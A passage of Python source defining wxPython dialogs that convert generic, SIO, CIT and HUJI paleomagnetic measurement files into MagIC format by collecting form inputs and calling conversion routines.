necessary)\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (self.site_naming_convention,wx.ALIGN_LEFT),\n (self.site_naming_convention_char,wx.ALIGN_LEFT)])\n self.bSizer5.AddSpacer(10)\n self.bSizer5.Add(gridbSizer5,wx.ALIGN_LEFT)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n #self.bSizer7 = pw.site_lat_lon(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer2a, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border=5)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n\n self.hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.bSizer2a.ShowItems(False)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_select_protocol(self, event):\n if self.protocol_info.GetValue() == \"cooling rate\":\n self.bSizer2a.ShowItems(True)\n else:\n self.bSizer2a.ShowItems(False)\n self.hbox_all.Fit(self)\n\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n # 
generic_magic.py -WD WD -f FILE -fsa er_samples.txt -F OUTFILE.magic -exp [Demag/PI/ATRM 6/AARM 6/CR] -samp X Y -site X Y -loc LOCNAME -dc B PHI THETA [-A] -WD path\n options = {}\n\n ErrorMessage = \"\"\n #-----------\n if not self.bSizer0.file_path.GetValue():\n pw.simple_warning('You must provide a generic format file')\n return False\n FILE = str(self.bSizer0.file_path.GetValue())\n options['magfile'] = FILE\n\n #-----------\n # WD=\"/\".join(FILE.split(\"/\")[:-1])\n WD=self.WD\n options['dir_path'] = WD\n input_dir = os.path.split(FILE)[0]\n magicoutfile=os.path.split(FILE)[1]+\".magic\"\n options['meas_file'] = magicoutfile\n print(\"magicoutfile\", magicoutfile)\n OUTFILE=os.path.join(self.WD,magicoutfile)\n #-----------\n #OUTFILE=self.WD+\"/\"+FILE.split('/')[-1]+\".magic\"\n #-----------\n EXP = \"\"\n exp = str(self.protocol_info.GetValue())\n if exp == 'Demag (AF and/or Thermal)':\n EXP = 'Demag'\n elif exp == 'Paleointensity-IZZI/ZI/ZI':\n EXP = 'PI'\n elif exp == 'ATRM 6 positions':\n EXP ='ATRM 6'\n elif exp == 'AARM 6 positions':\n EXP = 'AARM 6'\n elif exp == 'cooling rate':\n cooling = self.cooling_rate.GetValue()\n if not cooling:\n text = \"You must provide a cooling rate for this experiment type!\\nThe format is: xxx,yyy,zzz...\\nThese should be cooling rates in [K/minutes], separated by commas, in the same order as XXX.10,XXX.20 ...XX.70\"\n pw.simple_warning(text)\n return False\n EXP = 'CR {}'.format(cooling)\n if 'CR' in EXP:\n options['experiment'], options['cooling_times_list'] = EXP.split()\n elif 'AARM' in EXP:\n options['experiment'] = EXP\n #options['experiment'], options['aarm_n_pos'] = EXP.split()\n elif 'ATRM' in EXP:\n options['experiment'] = EXP\n #options['experiment'], options['atrm_n_pos'] = EXP.split()\n else:\n options['experiment'] = EXP\n #-----------\n SAMP=\"1 0\" #default\n\n samp_naming_convention = str(self.sample_naming_convention.GetValue())\n try:\n samp_naming_convention_char=int(self.sample_naming_convention_char.GetValue())\n except ValueError:\n samp_naming_convention_char = \"0\"\n\n if samp_naming_convention == 'sample=specimen':\n SAMP = \"1 0\"\n elif samp_naming_convention == 'no. of initial characters':\n SAMP = \"0 %i\" % int(samp_naming_convention_char)\n elif samp_naming_convention == 'no. of terminal characters':\n SAMP = \"1 %s\" % samp_naming_convention_char\n elif samp_naming_convention == 'character delimited':\n SAMP = \"2 %s\" % samp_naming_convention_char\n\n options['sample_nc'] = SAMP.split()\n #-----------\n\n SITE = \"1 0\" #default\n\n site_naming_convention = str(self.site_naming_convention.GetValue())\n try:\n site_naming_convention_char = int(self.site_naming_convention_char.GetValue())\n except ValueError:\n site_naming_convention_char = \"0\"\n\n if site_naming_convention == 'site=sample':\n SITE = \"1 0\"\n elif site_naming_convention == 'no. of initial characters':\n SITE = \"0 %i\" % int(site_naming_convention_char)\n elif site_naming_convention == 'no. 
of terminal characters':\n SITE = \"1 %s\" % site_naming_convention_char\n elif site_naming_convention == 'character delimited':\n SITE = \"2 %s\" % site_naming_convention_char\n\n options['site_nc'] = SITE.split()\n\n #-----------\n\n LOC = str(self.bSizer6.return_value())\n if LOC!=\"\": options['location'] = LOC\n\n if str(self.bSizer6.return_value()) != \"\":\n LOC=\"-loc \\\"%s\\\"\"%LOC\n else:\n LOC=\"\"\n\n #-----------\n\n LABFIELD=\" \"\n try:\n B_uT, DEC, INC = self.bSizer3.return_value().split()\n except ValueError:\n B_uT, DEC, INC = '0', '0', '0'\n\n #print \"B_uT, DEC, INC\", B_uT, DEC, INC\n options['labfield'], options['labfield_phi'], options['labfield_theta'] = B_uT, DEC, INC\n\n if EXP != \"Demag\":\n LABFIELD=\"-dc \" +B_uT+ \" \" + DEC + \" \" + INC\n\n #-----------\n\n #try: lat,lon = self.bSizer7.return_value().split()\n #except ValueError: lat,lon = '',''\n #options['lat'] = lat\n #options['lon'] = lon\n #lat = '-lat ' + lat\n #lon = '-lon ' + lon\n\n #-----------\n\n DONT_AVERAGE = \" \"\n if not self.bSizer8.return_value():\n DONT_AVERAGE = \"-A\"\n options['noave'] = 1\n else:\n options['noave'] = 0\n\n #-----------\n # some special\n\n SPEC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_specimens.txt\"\n SAMP_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_samples.txt\"\n SITE_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_sites.txt\"\n LOC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_locations.txt\"\n options['spec_file'] = SPEC_OUTFILE\n options['samp_file'] = SAMP_OUTFILE\n options['site_file'] = SITE_OUTFILE\n options['loc_file'] = LOC_OUTFILE\n\n COMMAND=\"generic_magic.py -WD %s -f %s -fsa er_samples.txt -F %s -exp %s -samp %s -site %s %s %s %s -Fsp %s -Fsa %s -Fsi %s -Flo %s \"\\\n %(WD,FILE,OUTFILE,EXP,SAMP,SITE,LOC,LABFIELD,DONT_AVERAGE, SPEC_OUTFILE, SAMP_OUTFILE, SITE_OUTFILE, LOC_OUTFILE)#, lat, lon)\n\n print(\"-I- Running Python command:\\n %s\"%COMMAND)\n program_run, error_message = convert.generic(**options)\n\n if program_run:\n pw.close_window(self, COMMAND, OUTFILE)\n else:\n pw.simple_warning(error_message)\n return False\n\n self.Destroy()\n self.parent.Raise()\n\n #def on_cancelButton(self,event):\n # self.Destroy()\n # self.parent.Raise()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.generic.__doc__)\n\n def get_sample_name(self, specimen, sample_naming_convention):\n if sample_naming_convention[0] == \"sample=specimen\":\n sample = specimen\n elif sample_naming_convention[0] == \"no. of terminal characters\":\n n = int(sample_naming_convention[1]) * -1\n sample = specimen[:n]\n elif sample_naming_convention[0] == \"character delimited\":\n d = sample_naming_convention[1]\n sample_splitted = specimen.split(d)\n if len(sample_splitted) == 1:\n sample = sample_splitted[0]\n else:\n sample = d.join(sample_splitted[:-1])\n return sample\n\n def get_site_name(self, sample, site_naming_convention):\n if site_naming_convention[0] == \"site=sample\":\n site = sample\n elif site_naming_convention[0] == \"no. 
of terminal characters\":\n n = int(site_naming_convention[1])*-1\n site = sample[:n]\n elif site_naming_convention[0] == \"character delimited\":\n d = site_naming_convention[1]\n site_splitted = sample.split(d)\n if len(site_splitted) == 1:\n site = site_splitted[0]\n else:\n site = d.join(site_splitted[:-1])\n\n return site\n\nclass convert_SIO_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\n convert SIO formatted measurement file to MagIC formatted files\n \"\"\"\n\n def InitUI(self):\n pnl = self.panel\n TEXT = \"SIO Format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n# bSizer_info.Add(wx.StaticText(self), wx.ALIGN_LEFT)\n\n self.bSizer0 = pw.choose_file(pnl, method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.experiment_type(pnl)\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.specimen_n(pnl)\n\n #---sizer 4a ----\n self.bSizer4a = pw.select_ncn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 11 ----\n #self.bSizer11 = pw.site_lat_lon(pnl)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n\n TEXT = \"peak AF field (mT) if ARM: \"\n self.bSizer8 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 9 ----\n\n TEXT = \"Coil number for ASC impulse coil (if treatment units in Volts): \"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 10 ---\n #self.bSizer10 = pw.synthetic(pnl)\n\n #---sizer 10 ---\n TEXT = \"cooling rates [K/minutes] (separated by commas) for cooling rate experiment:\"\n self.bSizer10 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ----\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.Add(self.bSizer5, flag=wx.ALIGN_LEFT)\n #hbox0.Add(self.bSizer11, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox0.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox1 =wx.BoxSizer(wx.HORIZONTAL)\n hbox1.Add(self.bSizer8, flag=wx.ALIGN_LEFT)\n hbox1.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox2 =wx.BoxSizer(wx.HORIZONTAL)\n hbox2.Add(self.bSizer10, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer4a, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(hbox1, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hbox2, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n 
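# note (added comment): Fit() sizes the frame to the sizer layout built above;\n # Centre()/Show() then position and display the finished dialog\n 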
hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n SIO_file = self.bSizer0.return_value()\n if not SIO_file:\n pw.simple_warning('You must provide a SIO format file')\n return False\n options_dict['mag_file'] = str(SIO_file)\n magicoutfile=os.path.split(SIO_file)[1]+\".magic\"\n outfile =os.path.join(self.WD, magicoutfile)\n options_dict['meas_file'] = str(outfile)\n user = self.bSizer1.return_value()\n options_dict['user'] = str(user)\n if user:\n user = \"-usr \" + user\n experiment_type = self.bSizer2.return_value()\n options_dict['codelist'] = str(experiment_type)\n if experiment_type:\n experiment_type = \"-LP \" + experiment_type\n lab_field = self.bSizer3.return_value()\n if not lab_field.strip():\n lab_field = \"\"\n options_dict['labfield'] = 0\n options_dict['phi'] = 0\n options_dict['theta'] = 0\n else:\n lab_field_list = str(lab_field).split()\n options_dict['labfield'] = lab_field_list[0]\n options_dict['phi'] = lab_field_list[1]\n options_dict['theta'] = lab_field_list[2]\n lab_field = \"-dc \" + lab_field\n spc = self.bSizer4.return_value()\n options_dict['specnum'] = spc\n ncn = self.bSizer4a.return_value()\n options_dict['samp_con'] = ncn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = str(loc_name)\n if loc_name:\n loc_name = \"-loc \" + loc_name\n instrument = self.bSizer6.return_value()\n options_dict['instrument'] = str(instrument)\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n options_dict['noave'] = 0\n else:\n options_dict['noave'] = 1\n if replicate:\n replicate = ''\n else:\n replicate = '-A'\n peak_AF = self.bSizer8.return_value()\n if not peak_AF:\n peak_AF = 0\n options_dict['peakfield'] = peak_AF\n if peak_AF:\n peak_AF = \"-ac \" + peak_AF\n coil_number = self.bSizer9.return_value()\n options_dict['coil'] = coil_number\n if coil_number:\n coil_number = \"-V \" + coil_number\n cooling_rates=\"\"\n cooling_rates = self.bSizer10.return_value()\n options_dict['cooling_rates'] = cooling_rates\n\n lat, lon = '', ''\n #try: lat,lon = self.bSizer11.return_value().split()\n #except ValueError: pass\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n lat = '-lat ' + lat\n lon = '-lon ' + lon\n\n # Force -A option on cooling rate correction experiment\n if cooling_rates !=\"\" and experiment_type ==\"-LP CR\":\n replicate = '-A'\n options_dict['noave'] = 1\n\n SPEC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_specimens.txt\"\n SAMP_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_samples.txt\"\n SITE_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_sites.txt\"\n LOC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_locations.txt\"\n options_dict['spec_file'] = SPEC_OUTFILE\n options_dict['samp_file'] = SAMP_OUTFILE\n options_dict['site_file'] = SITE_OUTFILE\n options_dict['loc_file'] = LOC_OUTFILE\n\n COMMAND = \"sio_magic.py -F {0} -Fsp {1} -Fsa {2} -Fsi {3} -Flo {4} -f {5} -spc {6} -ncn {7} {8} {9} {10} {11} {12} {13} {14} {15} {16}\".format(outfile, SPEC_OUTFILE, SAMP_OUTFILE, SITE_OUTFILE, LOC_OUTFILE, SIO_file, spc, ncn, user, experiment_type, cooling_rates, loc_name, lab_field, peak_AF, coil_number, instrument, replicate)#, lat, lon)\n print(\"COMMAND\", COMMAND)\n # to run as module:\n if convert.sio(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n 
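# note (added comment): each convert_2_magic converter carries its CLI usage in\n # its docstring, so the help button simply displays that text\n 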
pw.on_helpButton(text=convert.sio.__doc__)\n\n\nclass convert_CIT_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"Class that converts CIT magnetometer files into MagIC format for analysis and archiving\"\"\"\n\n def InitUI(self):\n pnl = self.panel\n\n TEXT = \"CIT Format file (.sam)\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n TEXT=\"Measurer (optional):\"\n self.bSizer1 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 2 ----\n self.bSizer2 = pw.sampling_particulars(pnl)\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_ncn(pnl)\n\n #---sizer 5 ---\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer5 = pw.specimen_n(pnl)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n self.bSizer7.replicate_rb2.SetValue(True)\n\n #---sizer 9 ----\n TEXT=\"Number of measurement orientations (default=8)\"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n wd = self.WD\n options_dict['dir_path'] = wd\n full_file = self.bSizer0.return_value()\n if not full_file:\n pw.simple_warning('You must provide a CIT format file')\n return False\n input_directory, CIT_file = os.path.split(full_file)\n options_dict['magfile'] = CIT_file\n options_dict['input_dir_path'] = input_directory\n if input_directory:\n ID = \"-ID \" + input_directory\n else:\n ID = ''\n outfile = CIT_file + \".magic\"\n options_dict['meas_file'] = outfile\n samp_outfile = CIT_file[:CIT_file.find('.')] + \"_samples.txt\"\n options_dict['samp_file'] = samp_outfile\n spec_outfile = CIT_file[:CIT_file.find('.')] + \"_specimens.txt\"\n options_dict['spec_file'] = spec_outfile\n site_outfile = CIT_file[:CIT_file.find('.')] + \"_sites.txt\"\n options_dict['site_file'] = site_outfile\n loc_outfile = CIT_file[:CIT_file.find('.')] + \"_locations.txt\"\n options_dict['loc_file'] = loc_outfile\n user = self.bSizer1.return_value()\n options_dict['user'] = user\n dc_flag,dc_params = '',''\n if self.bSizer3.return_value() != '':\n dc_params = self.bSizer3.return_value().split()\n 
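# note (added comment): the lab-field widget returns a single \"B phi theta\"\n # string; unpack it into the three dc-field keyword arguments passed to convert.cit\n 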
options_dict['labfield'] = dc_params[0]\n options_dict['phi'] = dc_params[1]\n options_dict['theta'] = dc_params[2]\n dc_flag = '-dc'\n if user:\n user = \"-usr \" + user\n spec_num = self.bSizer5.return_value()\n options_dict['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n loc_name = self.bSizer6.return_value()\n options_dict['locname'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n ncn = self.bSizer4.return_value()\n options_dict['samp_con'] = ncn\n particulars = self.bSizer2.return_value()\n options_dict['methods'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n replicate = self.bSizer7.return_value()\n if replicate:\n options_dict['noave'] = False\n replicate = ''\n else:\n options_dict['noave'] = True\n replicate = '-A'\n\n meas_n_orient = self.bSizer9.return_value()\n if meas_n_orient!='':\n try:\n int(meas_n_orient)\n options_dict['meas_n_orient'] = meas_n_orient\n except ValueError:\n pw.simple_warning(\"value for number of measured orientations must be a positive integer\")\n\n COMMAND = \"cit_magic.py -WD {} -f {} -F {} {} {} {} {} -ncn {} {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} {} {} -mno {}\".format(wd, CIT_file, outfile, particulars, spec_num, loc_name, user, ncn, ID, spec_outfile, samp_outfile, site_outfile, loc_outfile, replicate, dc_flag, dc_params, meas_n_orient)\n # to run as module:\n program_ran, error_message = convert.cit(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.cit.__doc__)\n\n\nclass convert_HUJI_files_to_MagIC(convert_files_to_MagIC):\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"HUJI format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n TEXT = \"HUJI sample orientation data file (Optional)\"\n bSizer_infoA = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_infoA.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0A ----\n self.bSizer0A = pw.choose_file(pnl, 'add', method = self.on_add_dat_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n exp_names=['AF Demag', 'Thermal (includes thellier but not trm)', 'NRM only', 'TRM acquisition', 'Anisotropy experiment', 'Cooling rate experiment']\n self.bSizer2 = pw.experiment_type(pnl, exp_names)\n\n #---sizer 2a ---\n #for box in self.bSizer2.boxes:\n # self.Bind(wx.EVT_CHECKBOX, self.on_select_protocol, box)\n self.bSizer2a = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL )\n text = 'Cooling Rate (required only for cooling rate type experiments)\\nformat is xxx,yyy,zzz with no spaces '\n self.cooling_rate = wx.TextCtrl(pnl)\n self.bSizer2a.AddMany([wx.StaticText(pnl, label=text), self.cooling_rate])\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ---\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 5 ----\n self.bSizer5 = pw.select_ncn(pnl)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ---\n #TEXT = \"peak AF field (mT) if ARM: \"\n #self.bSizer7 = pw.labeled_text_field(pnl, 
TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(bSizer_infoA, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0A, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n self.hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.bSizer2a.ShowItems(True)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_add_dat_file_button(self,event):\n text = \"HUJI sample orientation data file (Optional)\"\n pw.on_add_file_button(self.bSizer0A, text)\n\n def on_okButton(self, event):\n \"\"\"\n grab user input values, format them, and run huji_magic.py with the appropriate flags\n \"\"\"\n os.chdir(self.WD)\n options = {}\n HUJI_file = self.bSizer0.return_value()\n if not HUJI_file:\n pw.simple_warning(\"You must select a HUJI format file\")\n return False\n options['magfile'] = HUJI_file\n dat_file = self.bSizer0A.return_value()\n if os.path.isfile(dat_file): options['datafile'] = dat_file\n else: dat_file=\"\"\n magicoutfile=os.path.split(HUJI_file)[1]+\".magic\"\n outfile=os.path.join(self.WD, magicoutfile)\n options['meas_file'] = outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_specimens.txt\"\n spec_outfile=os.path.join(self.WD, magicoutfile)\n options['spec_file'] = spec_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_samples.txt\"\n samp_outfile=os.path.join(self.WD, magicoutfile)\n options['samp_file'] = samp_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_sites.txt\"\n site_outfile=os.path.join(self.WD, magicoutfile)\n options['site_file'] = site_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_locations.txt\"\n loc_outfile=os.path.join(self.WD, magicoutfile)\n options['loc_file'] = loc_outfile\n user = self.bSizer1.return_value()\n options['user'] = user\n if user:\n user = '-usr ' + user\n experiment_type = self.bSizer2.return_value()\n options['codelist'] = experiment_type\n if not experiment_type:\n pw.simple_warning(\"You must select an experiment type\")\n return False\n cooling_rate = self.cooling_rate.GetValue() or 0\n if cooling_rate:\n experiment_type = experiment_type + \" \" + cooling_rate\n lab_field = self.bSizer3.return_value()\n if not lab_field:\n lab_field = \"0 0 0\"\n lab_field_list = lab_field.split()\n options['labfield'] = lab_field_list[0]\n options['phi'] = lab_field_list[1]\n options['theta'] = lab_field_list[2]\n lab_field = '-dc ' + lab_field\n spc = self.bSizer4.return_value()\n options['specnum'] = spc or 0\n if not spc:\n spc = '-spc 0'\n else:\n spc = '-spc ' + spc\n ncn = 
